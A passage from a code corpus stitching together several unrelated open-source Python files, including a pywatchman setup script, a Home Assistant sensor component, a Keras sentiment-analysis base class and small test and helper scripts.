return State(self.gameSentence['solvable'], self.lives, -1)
else:
return State(self.gameSentence['solvable'], self.lives, 1)
def getSolvableSentence(self):
return self.gameSentence['solvable']
class State():
def __init__(self, sentence, lives, state):
"""
Data transfer object for easier accessing of the current state
"""
self.sentence = sentence
self.lives = lives
self.state = state
def __str__(self):
return "{} {} {}".format(self.sentence, self.lives, self.state) | Zephyrrus/ubb | YEAR 1/SEM1/FP/LAB/Examen/Controller/GameState.py | Python | mit | 2,082 |
#!/usr/bin/env python
# vim:ts=4:sw=4:et:
import os
watchman_src_dir = os.environ.get("CMAKE_CURRENT_SOURCE_DIR")
if watchman_src_dir is None:
watchman_src_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..")
# The python source dir.
# On Windows, this has to be relative to the cwd otherwise something
# in the setuptools machinery does the wrong thing and produces a
# path like `Z:blah` which on windows resolves ambiguously depending
# on the cwd.
py_dir = os.path.join(watchman_src_dir, "python")
if os.name == "nt":
py_dir = os.path.relpath(py_dir)
def srcs(names):
""" transform a list of sources to be relative to py_dir """
return ["%s/%s" % (py_dir, n) for n in names]
try:
from setuptools import setup, Extension
except:
from distutils.core import setup, Extension
setup(
name="pywatchman",
version="1.4.1",
package_dir={"": py_dir},
description="Watchman client for python",
author="Wez Furlong, Rain",
author_email="wez@fb.com",
maintainer="Wez Furlong",
maintainer_email="wez@fb.com",
url="https://github.com/facebook/watchman",
long_description="Connect and query Watchman to discover file changes",
keywords=("watchman inotify fsevents kevent kqueue portfs filesystem watcher"),
license="BSD",
packages=["pywatchman"],
ext_modules=[Extension("pywatchman.bser", sources=srcs(["pywatchman/bser.c"]))],
platforms="Platform Independent",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Topic :: System :: Filesystems",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
zip_safe=True,
scripts=srcs(
[
"bin/watchman-make",
"bin/watchman-wait",
"bin/watchman-replicate-subscription",
]
),
test_suite="tests",
)
| wez/watchman | python/setup.py | Python | apache-2.0 | 2,218 |
from __future__ import absolute_import, unicode_literals
from django.core.management.base import BaseCommand
from wagtail.wagtailcore.models import Page
class Command(BaseCommand):
help = 'Resets url_path fields on each page recursively'
def set_subtree(self, root, parent=None):
root.set_url_path(parent)
root.save(update_fields=['url_path'])
for child in root.get_children():
self.set_subtree(child, root)
def handle(self, *args, **options):
for node in Page.get_root_nodes():
self.set_subtree(node)
| chrxr/wagtail | wagtail/wagtailcore/management/commands/set_url_paths.py | Python | bsd-3-clause | 577 |
"""Component to interface with various sensors that can be monitored."""
from __future__ import annotations
from collections.abc import Mapping
from contextlib import suppress
from dataclasses import dataclass
from datetime import datetime, timedelta
import inspect
import logging
from typing import Any, Final, cast, final
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DEVICE_CLASS_AQI,
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_CO,
DEVICE_CLASS_CO2,
DEVICE_CLASS_CURRENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_GAS,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_ILLUMINANCE,
DEVICE_CLASS_MONETARY,
DEVICE_CLASS_NITROGEN_DIOXIDE,
DEVICE_CLASS_NITROGEN_MONOXIDE,
DEVICE_CLASS_NITROUS_OXIDE,
DEVICE_CLASS_OZONE,
DEVICE_CLASS_PM1,
DEVICE_CLASS_PM10,
DEVICE_CLASS_PM25,
DEVICE_CLASS_POWER,
DEVICE_CLASS_POWER_FACTOR,
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_SIGNAL_STRENGTH,
DEVICE_CLASS_SULPHUR_DIOXIDE,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_TIMESTAMP,
DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS,
DEVICE_CLASS_VOLTAGE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
from homeassistant.helpers.entity import Entity, EntityDescription
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.typing import ConfigType, StateType
from .const import CONF_STATE_CLASS # noqa: F401
_LOGGER: Final = logging.getLogger(__name__)
ATTR_LAST_RESET: Final = "last_reset" # Deprecated, to be removed in 2021.11
ATTR_STATE_CLASS: Final = "state_class"
DOMAIN: Final = "sensor"
ENTITY_ID_FORMAT: Final = DOMAIN + ".{}"
SCAN_INTERVAL: Final = timedelta(seconds=30)
DEVICE_CLASSES: Final[list[str]] = [
DEVICE_CLASS_AQI, # Air Quality Index
DEVICE_CLASS_BATTERY, # % of battery that is left
DEVICE_CLASS_CO, # ppm (parts per million) Carbon Monoxide gas concentration
DEVICE_CLASS_CO2, # ppm (parts per million) Carbon Dioxide gas concentration
DEVICE_CLASS_CURRENT, # current (A)
DEVICE_CLASS_ENERGY, # energy (kWh, Wh)
DEVICE_CLASS_HUMIDITY, # % of humidity in the air
DEVICE_CLASS_ILLUMINANCE, # current light level (lx/lm)
DEVICE_CLASS_MONETARY, # Amount of money (currency)
DEVICE_CLASS_OZONE, # Amount of O3 (µg/m³)
DEVICE_CLASS_NITROGEN_DIOXIDE, # Amount of NO2 (µg/m³)
DEVICE_CLASS_NITROUS_OXIDE, # Amount of NO (µg/m³)
DEVICE_CLASS_NITROGEN_MONOXIDE, # Amount of N2O (µg/m³)
DEVICE_CLASS_PM1, # Particulate matter <= 0.1 μm (µg/m³)
DEVICE_CLASS_PM10, # Particulate matter <= 10 μm (µg/m³)
DEVICE_CLASS_PM25, # Particulate matter <= 2.5 μm (µg/m³)
DEVICE_CLASS_SIGNAL_STRENGTH, # signal strength (dB/dBm)
DEVICE_CLASS_SULPHUR_DIOXIDE, # Amount of SO2 (µg/m³)
DEVICE_CLASS_TEMPERATURE, # temperature (C/F)
DEVICE_CLASS_TIMESTAMP, # timestamp (ISO8601)
DEVICE_CLASS_PRESSURE, # pressure (hPa/mbar)
DEVICE_CLASS_POWER, # power (W/kW)
DEVICE_CLASS_POWER_FACTOR, # power factor (%)
DEVICE_CLASS_VOLTAGE, # voltage (V)
DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS, # Amount of VOC (µg/m³)
DEVICE_CLASS_GAS, # gas (m³ or ft³)
]
DEVICE_CLASSES_SCHEMA: Final = vol.All(vol.Lower, vol.In(DEVICE_CLASSES))
# The state represents a measurement in present time
STATE_CLASS_MEASUREMENT: Final = "measurement"
# The state represents a monotonically increasing total, e.g. an amount of consumed gas
STATE_CLASS_TOTAL_INCREASING: Final = "total_increasing"
STATE_CLASSES: Final[list[str]] = [
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
]
STATE_CLASSES_SCHEMA: Final = vol.All(vol.Lower, vol.In(STATE_CLASSES))
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
"""Track states and offer events for sensors."""
component = hass.data[DOMAIN] = EntityComponent(
_LOGGER, DOMAIN, hass, SCAN_INTERVAL
)
await component.async_setup(config)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up a config entry."""
component = cast(EntityComponent, hass.data[DOMAIN])
return await component.async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
component = cast(EntityComponent, hass.data[DOMAIN])
return await component.async_unload_entry(entry)
@dataclass
class SensorEntityDescription(EntityDescription):
"""A class that describes sensor entities."""
last_reset: datetime | None = None # Deprecated, to be removed in 2021.11
native_unit_of_measurement: str | None = None
state_class: str | None = None
unit_of_measurement: None = None # Type override, use native_unit_of_measurement
def __post_init__(self) -> None:
"""Post initialisation processing."""
if self.unit_of_measurement:
caller = inspect.stack()[2] # type: ignore[unreachable]
module = inspect.getmodule(caller[0])
if "custom_components" in module.__file__:
report_issue = "report it to the custom component author."
else:
report_issue = (
"create a bug report at "
"https://github.com/home-assistant/core/issues?q=is%3Aopen+is%3Aissue"
)
_LOGGER.warning(
"%s is setting 'unit_of_measurement' on an instance of "
"SensorEntityDescription, this is not valid and will be unsupported "
"from Home Assistant 2021.11. Please %s",
module.__name__,
report_issue,
)
self.native_unit_of_measurement = self.unit_of_measurement
class SensorEntity(Entity):
"""Base class for sensor entities."""
entity_description: SensorEntityDescription
_attr_last_reset: datetime | None # Deprecated, to be removed in 2021.11
_attr_native_unit_of_measurement: str | None
_attr_native_value: StateType = None
_attr_state_class: str | None
_attr_state: None = None # Subclasses of SensorEntity should not set this
_attr_unit_of_measurement: None = (
None # Subclasses of SensorEntity should not set this
)
_last_reset_reported = False
_temperature_conversion_reported = False
@property
def state_class(self) -> str | None:
"""Return the state class of this entity, from STATE_CLASSES, if any."""
if hasattr(self, "_attr_state_class"):
return self._attr_state_class
if hasattr(self, "entity_description"):
return self.entity_description.state_class
return None
@property
def last_reset(self) -> datetime | None: # Deprecated, to be removed in 2021.11
"""Return the time when the sensor was last reset, if any."""
if hasattr(self, "_attr_last_reset"):
return self._attr_last_reset
if hasattr(self, "entity_description"):
return self.entity_description.last_reset
return None
@property
def capability_attributes(self) -> Mapping[str, Any] | None:
"""Return the capability attributes."""
if state_class := self.state_class:
return {ATTR_STATE_CLASS: state_class}
return None
@final
@property
def state_attributes(self) -> dict[str, Any] | None:
"""Return state attributes."""
if last_reset := self.last_reset:
if (
self.state_class == STATE_CLASS_MEASUREMENT
and not self._last_reset_reported
):
self._last_reset_reported = True
report_issue = self._suggest_report_issue()
_LOGGER.warning(
"Entity %s (%s) with state_class %s has set last_reset. Setting "
"last_reset is deprecated and will be unsupported from Home "
"Assistant Core 2021.11. Please update your configuration if "
"state_class is manually configured, otherwise %s",
self.entity_id,
type(self),
self.state_class,
report_issue,
)
return {ATTR_LAST_RESET: last_reset.isoformat()}
return None
@property
def native_value(self) -> StateType:
"""Return the value reported by the sensor."""
return self._attr_native_value
@property
def native_unit_of_measurement(self) -> str | None:
"""Return the unit of measurement of the sensor, if any."""
if hasattr(self, "_attr_native_unit_of_measurement"):
return self._attr_native_unit_of_measurement
if hasattr(self, "entity_description"):
return self.entity_description.native_unit_of_measurement
return None
@final
@property
def unit_of_measurement(self) -> str | None:
"""Return the unit of measurement of the entity, after unit conversion."""
# Support for _attr_unit_of_measurement will be removed in Home Assistant 2021.11
if (
hasattr(self, "_attr_unit_of_measurement")
and self._attr_unit_of_measurement is not None
):
return self._attr_unit_of_measurement # type: ignore
native_unit_of_measurement = self.native_unit_of_measurement
if native_unit_of_measurement in (TEMP_CELSIUS, TEMP_FAHRENHEIT):
return self.hass.config.units.temperature_unit
return native_unit_of_measurement
@final
@property
def state(self) -> Any:
"""Return the state of the sensor and perform unit conversions, if needed."""
unit_of_measurement = self.native_unit_of_measurement
value = self.native_value
units = self.hass.config.units
if (
value is not None
and unit_of_measurement in (TEMP_CELSIUS, TEMP_FAHRENHEIT)
and unit_of_measurement != units.temperature_unit
):
if (
self.device_class != DEVICE_CLASS_TEMPERATURE
and not self._temperature_conversion_reported
):
self._temperature_conversion_reported = True
report_issue = self._suggest_report_issue()
_LOGGER.warning(
"Entity %s (%s) with device_class %s reports a temperature in "
"%s which will be converted to %s. Temperature conversion for "
"entities without correct device_class is deprecated and will"
" be removed from Home Assistant Core 2022.3. Please update "
"your configuration if device_class is manually configured, "
"otherwise %s",
self.entity_id,
type(self),
self.device_class,
unit_of_measurement,
units.temperature_unit,
report_issue,
)
value_s = str(value)
prec = len(value_s) - value_s.index(".") - 1 if "." in value_s else 0
# Suppress ValueError (Could not convert sensor_value to float)
with suppress(ValueError):
temp = units.temperature(float(value), unit_of_measurement)
value = round(temp) if prec == 0 else round(temp, prec)
return value
def __repr__(self) -> str:
"""Return the representation.
Entity.__repr__ includes the state in the generated string, this fails if we're
called before self.hass is set.
"""
if not self.hass:
return f"<Entity {self.name}>"
return super().__repr__()
| FreekingDean/home-assistant | homeassistant/components/sensor/__init__.py | Python | apache-2.0 | 11,968 |
#!/usr/bin/env python
# -*- mode: python; coding: utf-8 -*-
##################################################################
# Documentation
##################################################################
# Imports
from __future__ import absolute_import, unicode_literals, print_function
try:
from cPickle import dump, load
except ImportError:
from _pickle import dump, load
from collections import Counter
from copy import deepcopy
from keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard
from keras.layers.embeddings import Embedding
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from keras.regularizers import l2
from keras.utils import to_categorical
from six import iteritems
from sklearn.utils.class_weight import compute_class_weight
from tempfile import mkstemp
import abc
import numpy as np
import os
from cgsa.base import BaseAnalyzer
from cgsa.utils.common import LOGGER, is_relevant, normlex
from .layers import CUSTOM_OBJECTS, DFLT_INITIALIZER, EMPTY_IDX, UNK_IDX
from .layers.word2vec import Word2Vec
from .utils import ModelMGPU, N_GPUS
##################################################################
# Variables and Constants
# default dimensionality for task-specific vectors
DFLT_VDIM = 100
DFLT_N_EPOCHS = 24 # 24
EMPTY_TOK = "%EMPTY%"
UNK_TOK = "%UNK%"
DICT_OFFSET = 1
UNK_PROB = 1e-4
L2_COEFF = 1e-4
EMB_INDICES_NAME = "embedding_indices"
# LBA Results for Different Optimizers:
# sgd: Macro: 10.33%; Micro: 36.2623%;
# rmsprop: Macro: 30.84%; Micro: 44.5902%;
# adagrad: Macro: 35.45%; Micro: 61.5738%;
# adadelta: 30.84%; Micro: 44.5902%;
# adam: Macro: 30.84%; Micro: 44.5902%;
# nadam: 30.84%; Micro: 44.5902%;
DFLT_TRAIN_PARAMS = {"optimizer": "adagrad",
"metrics": ["categorical_accuracy"],
"loss": "categorical_hinge"}
##################################################################
# Methods
##################################################################
# Class
class DLBaseAnalyzer(BaseAnalyzer):
"""Class for DeepLearning-based sentiment analysis.
Attributes:
"""
def __init__(self, w2v=False, lstsq=False, embeddings=None, **kwargs):
"""Class constructor.
Args:
w2v (bool): use word2vec embeddings
lstsq (bool): use the least squares method
embeddings (cgsa.utils.word2vec.Word2Vec or None): pretrained
embeddings
"""
super(DLBaseAnalyzer, self).__init__()
self.name = "DLBaseAnalyzer"
# boolean flags indicating whether to use external embeddings
self._w2v = w2v
self._lstsq = lstsq
# actual external embeddings
self._embeddings = embeddings
# mapping from words to their embedding indices in `self._embs` or
# `self.W_EMB`
self._w2i = {EMPTY_TOK: EMPTY_IDX, UNK_TOK: UNK_IDX}
self._pad_value = EMPTY_IDX
# mapping from words to their embeddings (will be initialized after
# training the network, if `w2v` or `lstsq` are true)
self._embs = None
# least squares matrix (will be initialized after training the network,
# if true)
self._lstsq_mtx = None
self.ndim = -1 # vector dimensionality will be initialized later
self.intm_dim = -1
self._model = None
self._model_path = None
self._trained = False
self._n_epochs = DFLT_N_EPOCHS
# mapping from word to its embedding index
self._aux_keys = set((0, 1))
self._max_seq_len = -1
self._min_width = 0
self._n_y = 0
self._train_params = deepcopy(DFLT_TRAIN_PARAMS)
self._fit_params = {}
# variables needed for training
self._w_stat = self._pred_class = None
self.W_EMB = self._cost = self._dev_cost = None
# initialize functions to None
self._reset_funcs()
# set up functions for obtaining word embeddings at train and test
# times
self._init_wemb_funcs()
def train(self, train_x, train_y, dev_x, dev_y,
a_grid_search, a_multi_gpu):
self._start_training()
self._logger.debug("Training %s...", self.name)
self._logger.debug("Preparing dataset...")
train_x, train_y, dev_x, dev_y = self._prepare_data(
train_x, train_y, dev_x, dev_y
)
self._logger.debug("Dataset ready...")
# initialize the network
self._logger.debug("Initializing the network...")
# self._update_fit_params(train_y)
self._init_nn()
self._logger.debug("Network ready...")
# initialize callbacks
_, ofname = mkstemp(suffix=".hdf5", prefix=self.name + '.')
try:
early_stop = EarlyStopping(patience=3, verbose=1)
chck_point = ModelCheckpoint(
filepath=ofname, monitor="val_categorical_accuracy",
mode="auto", verbose=1,
save_weights_only=True,
save_best_only=True
)
tensorboard = TensorBoard(
log_dir=os.environ.get("TENSORBOARD_DIR", "/tmp"),
histogram_freq=1, batch_size=32,
write_graph=True, write_grads=True
)
if a_multi_gpu:
train_model = ModelMGPU(self._model)
self._fit_params["batch_size"] = 32 * N_GPUS
train_model.compile(**self._train_params)
else:
train_model = self._model
train_model.fit(train_x, train_y,
validation_data=(dev_x, dev_y),
epochs=self._n_epochs,
callbacks=[early_stop, chck_point, tensorboard],
**self._fit_params)
self._model.load_weights(ofname)
self._finish_training()
finally:
os.remove(ofname)
self._logger.debug("%s trained", self.name)
def predict_proba(self, msg, yvec):
wseq = self._tweet2wseq(msg)
embs = np.array(
self._pad(len(wseq), self._pad_value)
+ [self.get_test_w_emb(w) for w in wseq], dtype="int32")
ret = self._model.predict(np.asarray([embs]),
batch_size=1,
verbose=2)
yvec[:] = ret[0]
def predict_proba_raw(self, messages):
yvecs = np.zeros((len(messages), self._n_y))
for i, msg_i in enumerate(messages):
self.predict_proba(msg_i, yvecs[i])
return yvecs
def restore(self, embs):
"""Restore members which could not be serialized.
Args:
embs (cgsa.utils.word2vec.Word2Vec or None): pretrained
embeddings
"""
self._embeddings = embs
self._logger = LOGGER
self._init_wemb_funcs()
def reset(self):
"""Remove members which cannot be serialized.
"""
# set functions to None
self._reset_funcs()
self._embeddings = None
self.W_EMB = None
super(DLBaseAnalyzer, self).reset()
def save(self, path):
"""Dump model to disc.
Args:
a_path (str): file path at which to store the model
Returns:
void:
"""
# set functions to None
model_path = path + ".h5"
self._model.save(model_path)
self._model_path = os.path.basename(model_path)
# all paths are relative
model = self._model
self._model = None
with open(path, "wb") as ofile:
dump(self, ofile)
self._model = model
def _load(self, a_path):
super(DLBaseAnalyzer, self)._load(a_path)
self._model = load_model(
os.path.join(a_path, self._model_path),
custom_objects=CUSTOM_OBJECTS
)
@abc.abstractmethod
def _init_nn(self):
"""Initialize neural network.
"""
raise NotImplementedError
def _extract_feats(self, a_tweet):
pass
def _start_training(self):
"""Prepare for training.
"""
self._trained = False
def _finish_training(self):
"""Finalize the trained network.
"""
self._logger.info("Finalizing network")
if self._lstsq or self._w2v:
emb_layer_idx = self._get_layer_idx()
if self._lstsq:
# Extract embeddings from the network
task_embs = self._model.layers[emb_layer_idx].get_weights()
assert len(task_embs) == 1, \
("Unmatching number of trained paramaters:"
" {:d} instead of {:d}").format(
len(task_embs), 1)
task_embs = task_embs[0]
# extract only embeddings of known words
START_IDX = UNK_IDX + 1
w2v_embs = self._embs
# Compute the least square matrix
self._logger.info("Computing transform matrix for"
" task-specific embeddings.")
self._lstsq_mtx, res, rank, _ = np.linalg.lstsq(
w2v_embs[START_IDX:], task_embs[START_IDX:]
)
self._logger.info("Transform matrix computed"
" (rank: %d, residuals: %f).",
rank, sum(res))
self._embs = task_embs
# pop embedding layer and modify the first layer coming after it to
# accept plaing embeddings as input
self._recompile_model(emb_layer_idx)
self._pad_value = self._embs[EMPTY_IDX]
self._logger.info("Network finalized")
self._trained = True
def _get_layer_idx(self):
"""Return the index of embedding layer in the model.
Args:
name (str): name of the layer (IGNORED)
Returns:
int: index of embedding layer
"""
return 0
def _recompile_model(self, emb_layer_idx):
"""Change model by removing the embedding layer and .
Args:
emb_layer_idx (int): index of the embedding layer
Returns:
void:
Note:
modifies `self._model` in place
"""
layers = self._model.layers
emb_layer = layers.pop(emb_layer_idx)
first_layer = layers.pop(emb_layer_idx)
layer_config = first_layer.get_config()
layer_config["input_shape"] = (None, emb_layer.output_dim)
new_layer = first_layer.__class__.from_config(
layer_config
)
new_layer.build((emb_layer.input_dim, emb_layer.output_dim))
new_layer.set_weights(first_layer.get_weights())
layers.insert(emb_layer_idx, new_layer)
self._model = self._model.__class__(layers=layers)
self._model.compile(**self._train_params)
def _init_wemb_funcs(self):
"""Initialize functions for obtaining word embeddings.
"""
if self.ndim < 0:
self.ndim = DFLT_VDIM
if self._w2v:
self._embeddings.load()
self.ndim = self._embeddings.ndim
self.init_w_emb = self._init_w2v_emb
self.get_train_w_emb_i = self._get_train_w2v_emb_i
if self._trained:
self.get_test_w_emb = self._get_test_w2v_emb
else:
self.get_test_w_emb = self._get_train_w2v_emb_i
elif self._lstsq:
self._embeddings.load()
self.ndim = self._embeddings.ndim
self.init_w_emb = self._init_w2v_emb
self.get_train_w_emb_i = self._get_train_w2v_emb_i
if self._trained:
self.get_test_w_emb = self._get_test_w2v_lstsq_emb
else:
self.get_test_w_emb = self._get_train_w2v_emb_i
else:
# checked
self.init_w_emb = self._init_w_emb
self.get_train_w_emb_i = self._get_train_w_emb_i
self.get_test_w_emb = self._get_test_w_emb_i
def _reset_funcs(self):
"""Set all compiled theano functions to None.
Note:
modifies instance variables in place
"""
self.get_train_w_emb_i = None
self.get_test_w_emb_i = None
self.init_w_emb = None
def _init_w_emb(self):
"""Initialize task-specific word embeddings.
"""
self.W_EMB = Embedding(len(self._w2i), self.ndim,
embeddings_initializer=DFLT_INITIALIZER,
embeddings_regularizer=l2(L2_COEFF))
def _init_w2v_emb(self):
"""Initialize word2vec embedding matrix.
"""
self._embeddings.load()
self.ndim = self._embeddings.ndim
self._embs = np.empty((len(self._w2i), self.ndim))
self._embs[EMPTY_IDX, :] *= 0
self._embs[UNK_IDX, :] = 1e-2 # prevent zeros in this row
for w, i in iteritems(self._w2i):
if i == EMPTY_IDX or i == UNK_IDX:
continue
self._embs[i] = self._embeddings[w]
# initialize custom keras layer
self.W_EMB = Word2Vec(self._embs, trainable=self._lstsq)
# We unload embeddings every time before the training to free more
# memory. Feel free to comment the line below, if you have plenty of
# RAM.
self._embeddings.unload()
def _get_train_w_emb_i(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
int:
embedding index of the given word
"""
a_word = normlex(a_word)
if a_word in self._w2i:
return self._w2i[a_word]
elif self._w_stat[a_word] < 2 and np.random.binomial(1, UNK_PROB):
return UNK_IDX
else:
i = self._w2i[a_word] = len(self._w2i)
return i
def _get_test_w_emb_i(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
int:
embedding index od the given word
"""
a_word = normlex(a_word)
return self._w2i.get(a_word, UNK_IDX)
def _get_train_w2v_emb_i(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
int: embedding index of the given word
"""
a_word = normlex(a_word)
if a_word in self._w2i:
return self._w2i[a_word]
elif a_word in self._embeddings:
i = self._w2i[a_word] = len(self._w2i)
return i
else:
return UNK_IDX
def _get_test_w2v_emb(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
np.array:
embedding of the input word
"""
a_word = normlex(a_word)
emb_i = self._w2i.get(a_word)
if emb_i is None:
if a_word in self._embeddings:
return self._embeddings[a_word]
return self._embs[UNK_IDX]
return self._embs[emb_i]
def _get_test_w2v_lstsq_emb(self, a_word):
"""Obtain embedding index for the given word.
Args:
a_word (str):
word whose embedding index should be retrieved
Returns:
np.array:
embedding of the input word
"""
a_word = normlex(a_word)
emb_i = self._w2i.get(a_word)
if emb_i is None:
if a_word in self._embeddings:
return np.dot(self._embeddings[a_word],
self._lstsq_mtx)
return self._embs[UNK_IDX]
return self._embs[emb_i]
def _prepare_data(self, train_x, train_y, dev_x, dev_y):
"""Provide train/test split and digitize the data.
"""
if not dev_x:
n = len(train_x)
n_dev = int(n / 15)
idcs = list(range(n))
np.random.shuffle(idcs)
def get_split(data, idcs):
return [data[i] for i in idcs]
dev_x = get_split(train_x, idcs[:n_dev])
dev_y = get_split(train_y, idcs[:n_dev])
train_x = get_split(train_x, idcs[n_dev:])
train_y = get_split(train_y, idcs[n_dev:])
# convert tweets to word indices
train_x, dev_x = self._digitize_data(train_x, dev_x)
self._n_y = len(set(train_y) | set(dev_y))
train_y = to_categorical(np.asarray(train_y))
dev_y = to_categorical(np.asarray(dev_y))
return (train_x, train_y, dev_x, dev_y)
def _compute_w_stat(self, train_x):
"""Compute word frequencies on the corpus.
Args:
train_x (list[list[str]]): training instances
Returns:
void:
Note:
modifies instance variables in place
"""
self._w_stat = Counter(w for t in train_x for w in t)
def _digitize_data(self, train_x, dev_x):
"""Convert sequences of words to sequences of word indices.
Args:
train_x (list[list[str]]): training set
dev_x (list[list[str]]): development set
Returns:
2-tuple[list, list]: digitized training and development sets
"""
train_x = [self._tweet2wseq(x) for x in train_x]
dev_x = [self._tweet2wseq(x) for x in dev_x]
self._compute_w_stat(train_x)
self._wseq2emb_ids(train_x, self.get_train_w_emb_i)
self._wseq2emb_ids(dev_x, self.get_test_w_emb)
train_x = self._pad_sequences(train_x)
dev_x = self._pad_sequences(dev_x)
return (train_x, dev_x)
def _pad(self, xlen, pad_value=EMPTY_IDX):
"""Add indices or vectors of empty words to match minimum filter length.
Args:
xlen (int): length of the input instance
"""
return [pad_value] * max(0, self._min_width - xlen)
def _pad_sequences(self, x):
"""Make all input instances of equal length.
Args:
x (list[np.array]): list of embedding indices
Returns:
x: list of embedding indices of equal lengths
"""
return pad_sequences(x)
def _tweet2wseq(self, msg):
"""Convert tweet to a sequence of word lemmas if these words are informative.
Args:
msg (cgsa.data.Tweet): input message
Return:
list: lemmas of informative words
"""
return [normlex(w.lemma)
for w in msg if is_relevant(w.form)]
def _wseq2emb_ids(self, data, w2i):
"""Convert sequence of words to embedding indices.
Args:
data (list[str]): list of input words
w2i (func): function to convert words to embedding indices
Return:
list[int]: list of embedding indices
"""
for i, inst_i in enumerate(data):
data[i] = np.asarray(
self._pad(len(inst_i))
+ [w2i(w) for w in inst_i], dtype="int32")
def _update_fit_params(self, train_y):
"""Add class weights to the training parameters.
Args:
train_y (list[np.array]): labels of training instances
Returns:
void:
Note:
modifies `self._train_params` in place
"""
return
y_labels = np.argmax(train_y, axis=-1)
class_weights = compute_class_weight("balanced",
np.unique(y_labels),
y_labels)
sample_weights = np.array([class_weights[y_i]
for y_i in y_labels])
self._fit_params["sample_weight"] = sample_weights
self._logger.debug("Class weights: %r", class_weights)
| WladimirSidorenko/CGSA | cgsa/dl/base.py | Python | mit | 20,205 |
#!/usr/bin/env python
#
# testing classes to test multiple inheritance.
# these are not meant to be run by trial, though they could be made to be so.
# i didn't know where to put them. --isis
import abc
from pprint import pprint
from inspect import classify_class_attrs
class PluginBase(object):
__metaclass__ = abc.ABCMeta
@abc.abstractproperty
def name(self):
return 'you should not see this'
@name.setter
def name(self, value):
return 'you should not set this'
@name.deleter
def name(self):
return 'you should not del this'
@abc.abstractmethod
def inputParser(self, line):
"""Do something to parse something."""
return
class Foo(object):
woo = "this class has some shit in it"
def bar(self):
print "i'm a Foo.bar()!"
print woo
class KwargTest(Foo):
_name = "isis"
#def __new__(cls, *a, **kw):
# return super(KwargTest, cls).__new__(cls, *a, **kw)
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def __init__(self, *a, **kw):
super(KwargTest, self).__init__()
## this causes the instantion args to override the class attrs
for key, value in kw.items():
setattr(self.__class__, key, value)
print "%s.__init__(): self.__dict__ = %s" \
% (type(self), pprint(type(self).__dict__))
for attr in classify_class_attrs(self):
print attr
@classmethod
def sayname(cls):
print cls.name
class KwargTestChild(KwargTest):
name = "arturo"
def __init__(self):
super(KwargTestChild, self).__init__()
print self.name
class KwargTestChildOther(KwargTest):
def __init__(self, name="robot", does="lasers"):
super(KwargTestChildOther, self).__init__()
print self.name
if __name__ == "__main__":
print "class KwargTest attr name: %s" % KwargTest.name
kwargtest = KwargTest()
print "KwargTest instantiated wo args"
print "kwargtest.name: %s" % kwargtest.name
print "kwargtest.sayname(): %s" % kwargtest.sayname()
kwargtest2 = KwargTest(name="lovecruft", does="hacking")
print "KwargTest instantiated with name args"
print "kwargtest.name: %s" % kwargtest2.name
print "kwargtest.sayname(): %s" % kwargtest2.sayname()
print "class KwargTestChild attr name: %s" % KwargTestChild.name
kwargtestchild = KwargTestChild()
print "KwargTestChild instantiated wo args"
print "kwargtestchild.name: %s" % kwargtestchild.name
print "kwargtestchild.sayname(): %s" % kwargtestchild.sayname()
print "class KwargTestChildOther attr name: %s" % KwargTestChildOther.name
kwargtestchildother = KwargTestChildOther()
print "KwargTestChildOther instantiated wo args"
print "kwargtestchildother.name: %s" % kwargtestchildother.name
print "kwargtestchildother.sayname(): %s" % kwargtestchildother.sayname()
| hackerberry/ooni-probe | tests/test-class-design.py | Python | bsd-2-clause | 2,996 |
#!/usr/bin/python
import argparse
import os
import sys
import LightsClient
parser = argparse.ArgumentParser()
parser.add_argument( 'sequenceName', metavar = 'sequence-name', type = str, nargs = 1, help = 'the new sequence name' )
args = parser.parse_args()
# re-open STDOUT so that it is un-buffered
sys.stdout = os.fdopen( sys.stdout.fileno(), 'w', 0 )
request = { 'command' : 'runSequence', 'sequenceName' : args.sequenceName[ 0 ] }
response = LightsClient.runCommand( request )
if 'success' in response and response[ 'success' ]:
print 'current sequence: %s' % ( response[ 'currentSequence' ] )
print 'frame: %d of %d' % ( response[ 'currentFrame' ], response[ 'numFrames' ] )
print 'frames per second: %d' % ( response[ 'framesPerSecond' ] )
else:
print response
| mattlyle/NeopixelXMasTree | server/backend/helper-scripts/run-sequence.py | Python | mit | 791 |
import math
from sqlalchemy.orm.exc import NoResultFound
from leaderboard.db import session_factory
from leaderboard.models.country_bounds import CountryBounds
from leaderboard.geo_util import coord_utils
from leaderboard.models.contributor import Contributor
from leaderboard.models.db import LeaderboardGlobals
from leaderboard.models.tile import Tile
from leaderboard.models import reportweeks
from test_base import BaseTest
class TestModels(BaseTest):
def test_countries_id_is_correct(self):
